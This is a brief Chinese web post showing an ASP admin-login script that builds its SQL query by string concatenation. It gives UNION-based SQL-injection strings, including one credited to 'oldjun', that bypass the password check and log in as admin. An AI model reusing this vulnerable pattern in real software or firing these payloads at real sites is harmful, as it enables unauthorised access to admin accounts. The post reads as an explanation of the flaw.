|
網(wǎng)上有很多這樣的登陸驗(yàn)證代碼
<%
username=trim(Request.Form("username"))
password=trim(Request.Form("password"))
sql="Select * FROM admin Where user='"&username&"'"
Set rs=Server.CreateObject("adodb.recordset")
rs.Open sql,conn,1,1
if rs.eof then
checksysUser=FALSE
else
passwd=trim(rs("pwd"))
if passwd=password then
Session("admin")=username
checksysUser=TRUE
else
checksysUser=FALSE
end if
End if
rs.close
conn.close
if checksysUser=true then
Response.Redirect("main.asp")
else
errmsg="<font color=#FF0000><b>用戶名輸入有誤,請重新輸入!</b></font>"
end if
%>
先在數(shù)據(jù)庫中查詢用戶名對(duì)應(yīng)的密碼,然后再和用戶輸入的密碼對(duì)比,導(dǎo)致'or'='or'這樣的萬能登陸密碼失
效.但如果在上面的程序中,用戶名輸入' union select 1,1,1 FROM admin Where ''=',密碼輸入1,就可以登陸成功,原理很簡單,就不多說了.順便附上oldjun的語句:' union select 1,1,1 AS pwd FROM admin Where ''=
編輯:北京信誠IT保姆IT外包部 http:// www.aboverow.cn www.xcit.com.cn |
當(dāng)前位置:
